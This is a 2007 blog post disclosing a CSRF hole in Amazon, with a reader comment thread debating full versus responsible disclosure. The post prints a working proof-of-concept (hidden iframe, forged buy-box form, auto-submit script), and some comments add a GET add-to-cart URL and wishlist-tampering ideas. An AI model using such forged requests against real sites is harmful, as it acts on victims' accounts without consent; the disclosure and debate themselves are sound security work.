About the Author

Chris Shiflett

Hi, I’m Chris: web craftsman, community leader, husband, father, and partner at Fictive Kin.


My Amazon Anniversary

Today I am revealing an exploitable security vulnerability in Amazon. Before I do, I want to provide some history and context.

On this day last year, I informed Amazon about a pretty serious vulnerability and demonstrated it with a few examples and a detailed description. In the description, I explained how to exploit the infamous "1-Click" feature, causing victims to purchase items of my choosing without their knowledge or consent, and I stressed that the scope of the problem extended beyond my benign examples. After some mild prodding, I finally received a reply letting me know that my email had been received, the vulnerability had been verified, and Amazon considered fixing it a top priority.

This is usually the extent of my involvement in such affairs. It's remarkably easy to find vulnerabilities in web applications, so I see no reason to make a big deal out of every discovery. Plus, it's enough trouble to inform web sites about vulnerabilities (something many of my colleagues don't bother doing for good reasons), so once I've done so, I feel like I've fulfilled my ethical responsibility.

Despite my prodding, the vulnerability remains a year later.

I feel like Amazon has exploited my cooperative behavior and placed me in a moral dilemma. In fact, at this point, I feel like I've already done the wrong thing by withholding this information for so long. The silence ends today.

The following example demonstrates the problem:

<!-- Invisible target frame, so the victim never sees Amazon's response -->
<iframe style="width: 0px; height: 0px; visibility: hidden" name="hidden"></iframe>
<!-- The same two fields posted to Amazon's buy-box handler; the victim's
     browser attaches their Amazon session cookies automatically -->
<form name="csrf" action="http://amazon.com/gp/product/handle-buy-box" method="post" target="hidden">
<input type="hidden" name="ASIN" value="059600656X" />
<input type="hidden" name="offerListingID" value="XYPvvbir%2FyHMyphE%2Fy0hKK%2BNt%2FB7%2FlRTFpIRPQG28BSrQ98hAsPyhlIn75S3jksXb3bdE%2FfgEoOZN0Wyy5qYrwEFzXBuOgqf" />
</form>
<!-- Submitted as soon as the page loads; no click by the victim is required -->
<script>document.csrf.submit();</script>

This exploit is pretty benign, because it only adds an item to your shopping cart. Always be sure to inspect your cart carefully each time you check out!

Yes, this is CSRF, and I plan to update my article in the next few days to include Amazon and Digg as examples, and I'll elaborate a bit more on the various techniques in use today.

Amazon has started requiring re-authentication in several places, so many actions are protected against CSRF. For example, the "1-Click" feature has been improved to protect against this, because adding a new address now requires re-authenticating, and a forged cross-site request can carry the victim's cookies but not the victim's password. This is a good thing.

This entire affair has me rethinking my stance on full disclosure, something I alluded to in a recent interview. The wikipedia article on full disclosure has this to say about responsible disclosure:

One challenge with "responsible disclosure" is that some vendors do not respond, or inordinately delay their response, to vulnerability reports that are not public. As long as a vulnerability is not widely known to the public (with enough detail to reproduce the attack), vendors may refuse to fix the vulnerability or refuse to give it enough priority to actually repair it. Unfortunately, vulnerabilities reported to a vendor may already be exploited, or may soon be detected by someone with intent to exploit them.

This is my primary concern. There's nothing particularly sophisticated about this attack, so I feel confident that someone else has discovered it by now, and as a user of Amazon myself, I'm not comfortable with that.

The RFPolicy offers a reasonable middle-ground; perhaps that's the best approach.

About this post

My Amazon Anniversary was posted on Thu, 15 Mar 2007.

41 comments

1.David said:

Sorry. My shopping cart is still empty. I understand the concept behind the attack, but perhaps Amazon fixed the problem in the past 45 minutes? Or will it only add an item to your cart if you have 1-Click turned on?

Thu, 15 Mar 2007 at 22:38:28 GMT Link


2.gasper said:

You have an HTML link typo in the post at the beginning of the paragraph that starts with "Yes, this is ...".

Thu, 15 Mar 2007 at 23:42:04 GMT Link


3.Martin P said:

I thought you were waiting until next month's issue of PHP|A to talk about this? Hm, oh well. :)

Fri, 16 Mar 2007 at 02:05:34 GMT Link


4.Pete Lindstrom said:

You can shoot for the moral high ground as much as you want, but you are way below sea level on this one. You increased the risk to Amazon's customers, probably by orders of magnitude with this post, and all in the name of some sort of self-serving morality play.

Vulnerabilities are everywhere. They exist now, on the Internet. Most of them, you don't even know about. When you make an announcement like this, it increases the threat and focuses malicious efforts on this hole. What gives you the right to choose which vulns are important and which ones aren't? Why is this particular pot-shot so much more important than all the others that may be out there?

Pete

Fri, 16 Mar 2007 at 03:31:52 GMT Link


5.Martin P said:

Pete, I think you miss the point in that Amazon was made aware of this problem and has sat on it for a year without doing anything about it. Why blame Chris? I'm more insulted as a customer. If anything, this kind of exposure will get the hole fixed sooner rather than later, making whoever's next purchase a much more relaxing one.

Or would you rather the people that currently do know about it simply continue to get away with using it?

Fri, 16 Mar 2007 at 03:57:57 GMT Link


6.Pete said:

@Martin -

How can you be sure nothing was done? How can you be sure they didn't fix 200 other vulnerabilities that were more significant that you didn't know about? Who knows, relatively, how significant this hole really is?

There are hundreds of millions of vulnerabilities on the Internet - really. The fact that Chris found one doesn't make it special... actually, it does now because he is focusing the threat.

I had to laugh at your "relaxed" purchase comment - it was a joke, right?

Pete

Fri, 16 Mar 2007 at 04:25:48 GMT Link


7.John Layman said:

@Pete:

If Amazon really considered it a "top priority" I would hope they could have addressed it within a year. I feel that this was a very generous time period. If it takes disclosure to motivate them to fix it, then at least it gets done. As Chris said, I'm sure he's not the only person who has figured this exploit out by now.

Sure, this might temporarily increase the level of vulnerability, but if it inspires Amazon to take documented vulnerabilities more seriously, I'd say it's worth it.

Fri, 16 Mar 2007 at 04:46:28 GMT Link


8.Pete said:

@John -

This doesn't increase the vulnerability, it increases the threat. It is entirely artificial and arbitrary, and therefore bad.

Feel free not to confuse an emotional reaction to being slighted and blustered by Amazon as some sort of legitimate reason to screw everyone else over.

And no, attackers don't know about this particular one. There are actually four others* they know about that you don't and they are actively exploiting those.

"I'd say it's worth it" - while you have every right to say whatever you want, that doesn't give you the right to determine for others what is or isn't "worth it."

And tell me again why this is a good thing... is it the grudge part or the spite part?

*a dramatization to highlight the fact that uncertainty is hard to deal with, but it is the state in which we live.

Fri, 16 Mar 2007 at 05:04:50 GMT Link


9.David Rodger said:

Gee Pete,

if you think that Chris, with his soul-searching, is screwing everyone over by disclosing this after a whole year, what do you think of Stefan Esser's approach, where, if you haven't fixed the vulnerability after a week, it's exposed and he calls you all sorts of names!?

Fri, 16 Mar 2007 at 06:25:54 GMT Link


10.Gestowitch said:

Gee Pete, what a bullsh....., Amazon ... vulnerability ... one year ... lol

Fri, 16 Mar 2007 at 12:16:30 GMT Link


11.shrdlu said:

@Pete -

"Vulnerabilities are everywhere. They exist now, on the Internet. Most of them, you don't even know about. When you make an announcement like this, it increases the threat and focuses malicious efforts on this hole. What gives you the right to choose which vulns are important and which ones aren't? Why is this particular pot-shot so much more important than all the others that may be out there?"

Simple. HE KNEW ABOUT THIS ONE. Because he knew, and tried to get it fixed, without success, he felt obligated to do what he could to increase the chances of getting it fixed. Why is this so hard to understand, Pete?

"And no, attackers don't know about this particular one. There are actually four others* they know about that you don't and they are actively exploiting those."

As Pete claims to speak for all attackers ... How do you know that this one isn't being exploited too? How do you know that posting this vulnerability does, in fact, increase the threat as opposed to increasing the chance that the vulnerability will finally be closed? You don't.

"And tell me again why this is a good thing... is it the grudge part or the spite part?"

Why, it's the ad hominem attack part, of course!

Fri, 16 Mar 2007 at 13:21:18 GMT Link


12.Ed said:

Pete, as an amazon customer I applaud Chris.

I'd rather know the threats to my online safety (even if that knowledge puts me at more risk, which it may not) and use that knowledge to make informed decisions than live in absolute ignorance, unable to make any sort of judgment about my online safety.

Plus, I find your argument that there are far more significant vulnerabilities, therefore this vulnerability is insignificant and should be ignored, absurd.

Fri, 16 Mar 2007 at 13:50:07 GMT Link


13.Edward Yang said:

Can anyone confirm whether or not the exploit still works? If it had been fixed as David suggests, there could be a possibility that Amazon saw this blog post, fixed it, and thus full disclosure works. (or, possibly, the timing was extremely lucky, and Amazon had just gotten around to fixing it).

Fri, 16 Mar 2007 at 16:39:20 GMT Link


14.Pete said:

@David - In my opinion, Stefan and Chris are in essentially the same boat with the obvious caveat that volume of activity in this space is more damaging.

@Gestowitch - if you've only worked in a two-person company, you would have that perspective.

@shrdlu -

1) It's not hard to understand at all - people often try to characterize others and pretend to understand their work environments and exaggerate their own personal beliefs and try to force them on everyone else.

2) I recognize that it feels good to be certain about a few things and be able to address them. What I am suggesting is that this is not only insufficient, but also distracting. Whatever vulnerabilities are being exploited are the ones I want to pay attention to and if I have to (now) expend extra resources on one particular one, that means it is clear sailing on any others.

@Ed -

1) If your definition is shortsighted and based on the fixing of a single vulnerability, and you don't care about what it does to the risk equation, and if the attackers only happen to have this particular vulnerability available to exploit, then you might be right.

2) You don't need to live in absolute ignorance to embrace the idea that you can't know about every single vulnerability and therefore need to protect yourself using techniques that don't rely on that.

3) I didn't make the argument you claim. I argue that significance is a measure of risk - threats, vulns, and consequences. This vuln has now been elevated in significance (greater risk) through this announcement. There are (were) other equally significant vulnerabilities that get less attention that are now in the same boat as this one was, and you can't find them all. Time to come up with a new strategy for protection rather than bailing fruitlessly in a sinking ship.

My last post here. If you want to take it offline, you can find me on the Web fairly easily.

Pete Lindstrom

Fri, 16 Mar 2007 at 19:22:33 GMT Link


15.Ian said:

Kudos Chris,

Keep the vulnerabilities coming. It keeps the big corporations from becoming complacent.

All vulnerabilities highlighted by the Month of Apple Bugs were fixed (well at least by Apple), so it works.

Keep up the good work!

Sat, 17 Mar 2007 at 00:16:24 GMT Link


16.Aaron Wormus said:

It's not a bug, it's the 0-click (tm) checkout system.

Sat, 17 Mar 2007 at 10:35:21 GMT Link


17.Gestowitch said:

@Pete: My last post here.

Thanks Pete

Sat, 17 Mar 2007 at 11:03:47 GMT Link


18.Geoffrey Young said:

getting hit from all sides doesn't seem like much fun to me...

If I were to find something like this I'd probably just submit it to CERT and let them take the initiative with Amazon (and the heat when they release the information after 45 days, or whatever it is). For example, you can check CVE for Amazon vulnerabilities and let yours just be added to the list. Presumably, a company like Amazon is more likely to respond to something formal like these organizations than to a random email or blog post :)

Sun, 18 Mar 2007 at 17:21:02 GMT Link


19.Chris Shiflett said:

David wrote:

Sorry. My shopping cart is still empty.

If you want to try this, I have a temporary example that demonstrates the problem. The vulnerability is easy to fix, so hopefully it won't persist much longer.

Pete Lindstrom wrote:

You increased the risk to Amazon's customers, probably by orders of magnitude with this post, and all in the name of some sort of self-serving morality play.

I'm glad more people don't share your perspective, because it's a dangerously naive one.

I expect some people to criticize me for withholding this information for so long, but I don't like disclosing vulnerabilities before they have been fixed.

Since you seem to be brazenly misinterpreting my post, here's a clarifying list of facts:

1. This vulnerability has existed for years.

2. Amazon has known about it for over a year.

3. It's easy to fix.

Your ad hominem attacks are childish and highlight the lack of a logical foundation to your argument. Regardless, here are a few things that lead me to disclose the vulnerability now:

1. Adding a new address now requires re-authentication, so the "1-Click" exploit no longer works.

2. There may indeed be other CSRF vulnerabilities, but adding arbitrary items to someone's shopping cart is the only one of which I'm currently aware.

3. Users who are aware of this vulnerability are more empowered, because they know to be cautious before checking out. Thus, more awareness is a good thing, even if Amazon continues to ignore the vulnerability.

You're welcome to abide by the ignorance is bliss philosophy, but your evangelical efforts are not appreciated.

Finally, as an example of my persistence, here's an excerpt from an email I sent to several of Amazon's senior security contacts about five months after my first disclosure:

I feel that you're placing me in an ethical dilemma and adding strength to the arguments of those who support full disclosure. Out of respect for me and my sincere and persistent efforts, please take active steps to address this vulnerability.

Aaron wrote:

It's not a bug, it's the 0-click (tm) checkout system.

Very funny. :-)

Geoffrey Young wrote:

For example, you can check CVE for Amazon vulnerabilities and let yours just be added to the list.

Good idea. Thanks!

Sun, 18 Mar 2007 at 20:12:58 GMT Link


20.sid said:

@Chris

: you did what you could do. If an optimal pattern of behavior exists in this case, it's probably the one you showed, so stop worrying about it :)

@Pete

: so, is "ignorance is bliss" the bottom line of what you are saying?

Frankly, I would prefer knowing about the bug, being a little more paranoid, and thus even more careful.

I just tried the temporary example. Fully works.

There is absolutely no excuse for Amazon for not fixing this during a one-year timespan (supposing that Chris was the first one to tell them about it).

Mon, 19 Mar 2007 at 09:08:16 GMT Link


21.Chris Shiflett said:

If an optimal pattern of behavior exists in this case, it's probably the one you showed, so stop worrying about it :)

Thanks, Sid. :-)

Mon, 19 Mar 2007 at 11:17:17 GMT Link


22.Charles said:

Hmmm, I have a book by Chris Shiflett in my Cart. Nice.

Thu, 22 Mar 2007 at 20:52:20 GMT Link


23.Morad Rayyan said:

Amazon deserves this. They could've taken care of this right away, just in case "Chris" announced it on his site the day after his email. But nope, they just dropped the ball :)

Sat, 24 Mar 2007 at 22:08:37 GMT Link


24.Drew Hintz said:

Vuln disclosure for web client security is even more thorny than disclosure for traditional applications. I wonder how it will play out.

Sun, 25 Mar 2007 at 16:29:26 GMT Link


25.Drew Hintz said:

@David, the exploit worked for me.

Sun, 25 Mar 2007 at 16:48:24 GMT Link


26.Mohamed Almasry said:

good man .. but i think this is not ethical .. any way ..

Wed, 28 Mar 2007 at 04:41:32 GMT Link


27.Jeremy said:

Worked for me as well ... once I turned on NoScript for the domain. Another good reason to run with javascript protection turned on.

Fri, 30 Mar 2007 at 19:15:01 GMT Link


28.anon said:

Congratulations on rising to the bait. Pete has now publicly stated that he will keep security vulnerabilities private forever, no matter how many people it keeps in the dark or endangers, going against his rebellious peers.

Companies like Amazon, which apparently wait to fix holes until some ROI threshold is met (1,000 users exploited, 10,000 users?), love that sort of mentality.

And Pete happens to own a security company that does consulting work...

2 + 2 together...

Wed, 04 Apr 2007 at 17:30:07 GMT Link


29.Viv said:

With Pete's idea, it's kind of like seeing the drug dealer passing his drugs to school kids and just closing his door to it! Tsk! Tsk! Tsk!

Sat, 28 Apr 2007 at 20:31:48 GMT Link


30.Wouter said:

Chris,

Do you know if orders for your book have increased with Amazon? :)

Tue, 01 May 2007 at 13:19:50 GMT Link


31.Dave Riley said:

For what it's worth, the exploit is *still* working... clicked on Chris' link to the demo he posted midway through the comments above, and his book is now sitting in my shopping cart (and if I still coded in PHP, I might consider buying it :-).

Thu, 28 Jun 2007 at 17:47:45 GMT Link


32.David Wolf said:

Still works after almost 4 months of this blog posting. Amazon knew about this a year before that. How long is Amazon going to take?

Thanks for revealing this, Chris. It just doesn't make sense that companies the size of Amazon, with tons of resources, can't solve issues like this quickly. It just all comes down to resource allocation. If they had to they could probably afford to hire enough programmers so they have one for every vulnerability they know about. That would be absurd, of course, but they could do it if they needed to. But as long as the site still brings in dollars they don't feel the urgency to do that. (But if the money stopped flowing their way you know they would have EVERY available resource focused on the problem.)

If Chris has a solution to the issue why don't they just fix it and move along? I really don't appreciate it when people disclose vulnerabilities without ample warning to the developer. That really seems irresponsible. But Chris has given Amazon MORE than enough time to respond. If Chris has the solution, and the folks at Amazon don't have the time to figure out the fix, Amazon certainly has the resources to ask Chris for some help.

Here are some policy suggestions for Amazon:

Amazon should offer a small reward for anyone reporting a vulnerability if they also provide the solution. Then identify one person on their development team whose sole job it is to implement the fixes. That would make all of the easy-to-fix issues disappear quickly. Have a stated policy to have any vulns reported in this way fixed within 30 days. (Should be shorter, but this still gives Amazon flexibility to prioritize issues based on urgency.) Remember, these are vulns reported where the solution is given to them at the time of reporting.

Amazon could have another policy to handle vulns reported without solutions. These would be handled by a different team. They should confirm receipt of the report within 24 hours, confirm the problem and an estimated time for dealing with the issue with the reporter within 1 week and ask that the vuln not be revealed publicly for at least 30 days. Any serious problem should get dealt with within 30 days. Anything minor enough not to get attention within 30 days should not be a big issue for public disclosure. (Or so one would hope.) If a serious issue is so big that Amazon can't fix it in 30 days then they should be in close contact with the people who reported the issue to ask for more time before disclosure, and to ask them for help with solutions.

Finally, Amazon should start a policy of reducing the bonuses of executives and managers every time a vulnerability remains on their list longer than 30 days.

If just this last item became policy something tells me most of the issues would disappear right away.

Thu, 05 Jul 2007 at 18:52:39 GMT Link


33.Amer Neely said:

I applaud your actions completely. Hiding your head in the sand when security is involved is ridiculous. I also appreciate your dilemma.

You are probably aware of a problem with PayPal button forms. As a Perl developer, I was tasked with implementing a PayPal button on a client's site. During this process I discovered what I thought was a major 'loophole'. At first I thought I was missing something, but in several emails and phone calls to PayPal, I realized (and they confirmed) that yes, that is the way the buttons work.

I'm not going to go into details here - this is not my soapbox - but just to give you some support and say good luck with your choices.

Sun, 15 Jul 2007 at 16:22:43 GMT Link


34.Takuan Daikon said:

I can't believe that still works O.o

Fri, 20 Jul 2007 at 13:30:32 GMT Link


35.Francis said:

Still works....

Sat, 21 Jul 2007 at 12:57:50 GMT Link


36.Martin said:

Hey Chris,

It still works.

And Amazon probably spent more thought on this security problem than you think.

Here is my explanation:

The basic idea of one-click links is that any website can automatically drop an item into your shopping cart once you click on some button on that website, right? To prevent websites from implementing the zero-click solution you would have to embed a token into the link; a new and unique token would have to be served with every single buy-now link.

This simply does not work for static HTML pages.

(And Amazon Associates links are supposed to be embeddable in simple static HTML.) Of course the dynamic part could be on the client side, possibly a script that dynamically embeds a one-click link when the page is displayed, but then one-click links would not work for browsers with JavaScript disabled. Additionally, this would increase the shopping barrier rather than lowering it, which is what the one-click idea is all about.

The best solution would be to use an embedded iframe element and host the complete ad at Amazon, using some token mechanism. But nevertheless this would require gazillions of webmasters to exchange the snippets they embedded in their old HTML!

On the day the "security hole" is closed, none of the old buy-now links would work anymore, or would require a second confirmation step, effectively turning each one-click link into a two-click link.

Mon, 10 Sep 2007 at 12:29:58 GMT Link


37.Martin said:

I have checked the Amazon Associates program, and they actually have come up with a solution:

The links that you can automatically generate at the Amazon Associates Center contain a new URL that provides the ad inside an IFRAME element, with an individual SessionID created each time. If you mess with the SessionID, Amazon will gently switch to a two-click solution, asking the user to confirm that he really wants to put the product in his shopping basket (using the SessionID to prevent CSRF attacks).

The new solution is located at a new URL:

http://www.amazon.com/gp/aws/cart/add.html

Parameters are passed via GET request. Just add ASIN.1=059600656X and Quantity.1=999 ;)

I think Amazon just keeps the old solution running, hoping that the Amazon links floating around on the web that still use the old URL will eventually die out. I guess if a critical mass is reached they will add a confirmation step to the old URL as well...

Mon, 10 Sep 2007 at 13:01:39 GMT Link


38.Martin said:

I think it is also interesting to note that websites can not only drop stuff in your shopping basket without your consent, but they can also mess with your wishlist.

Just imagine a website that enhances your wishlist, by the latest literature on some arbitrary sexual fetish.

This will not only render your Amazon recommendations completely useless and annoying, but if your wishlist is public (and that is what wishlists are for) you may face a very big surprise on your next birthday or Christmas.

Your parents in law might even cancel the wedding, if they discover all those gay coming-out books that suddenly show up in your Amazon wedding-list. Well you get the idea.

Fortunately there are no such things as CSRF attacks for good old pen-and-paper lists :)

While most people probably double-check orders they make on Amazon, no one regularly checks his own wishlist...

Mon, 10 Sep 2007 at 14:03:22 GMT Link


39.Heather P said:

I applaud this disclosure, and agree with previous posters who say that a year is more than enough time to fix a simple error.

I would be less concerned about these kinds of issues if Amazon had some kind of security/fraud policy that protects their customers. But, as I sadly just found out, they have no such policy.

Because of what just happened to us, I recommend that everyone who uses Amazon removes their payment information from the site. It's a pain to have to enter your card numbers each time, but it is infinitely more safe.

Short story: Someone hacked my husband's Amazon account and changed the email and password and shipping address. Because they do not require users to confirm such changes before purchases, the hacker charged almost $600 to our card before my husband could respond to the change alert and let Amazon know that he was not the one who changed the account information.

It has now been a week and a half, and after numerous emails and phone calls their only answer is for us to dispute the charge at our bank. They even shipped the merchandise three days after we informed them that it was a fraudulent charge.

Their ineptitude is why information like this is so important to the consumer. Everyone I know is removing their payment info from the website now as some kind of weak counter measure. But it's sad, because it would be so easy for them to fix this as well. But I'm sure they won't. It's their way.

Fri, 09 Nov 2007 at 23:14:01 GMT Link


40.Lewyx said:

Pete's arguments made me laugh. If Amazon really had that many more severe bug-fixing to-dos for a year, then I'd better not be their client. As seen below, a solution is underway and the hole is only kept open for backward compatibility. Why don't I see big announcements that propagate the migration to their new 1clk-links? I agree that they don't react promptly enough.

Regarding the disclosure: it is justified by informing future victims. If I get something I've never ordered, now I don't just accept it, thinking that my son stole my password, but have a way to defend myself, thanks to this publication. I agree that this elevates the risk, but I think it's worth protecting Amazon clients through clarifying responsibilities.

Mon, 21 Jan 2008 at 09:24:09 GMT Link


41.Bryan Lee said:

I agree that Chris did the right thing by pointing out the vulnerabilities of Amazon. If Chris has found this vulnerability, I'm pretty sure that there are many others out there that have already found it by now. So, please stop pretending that only Chris knows it or that he is doing something wrong by posting it. It has been there for more than a year, ok? That means... a high possibility that somebody has already found it.

This actually shows that Amazon is either lacking in IT personnel/expertise or they just don't value it if they took more than a year to fix a bug. More than anything, this should force corporations like this to appreciate their IT personnel more and thus create more jobs for us. I cannot believe that a big firm like amazon that gets its revenue mostly from online sales will want to be complacent about these issues.

oh, by the way, out of curiosity, pete, do you work for amazon?

Wed, 15 Oct 2008 at 09:36:46 GMT Link

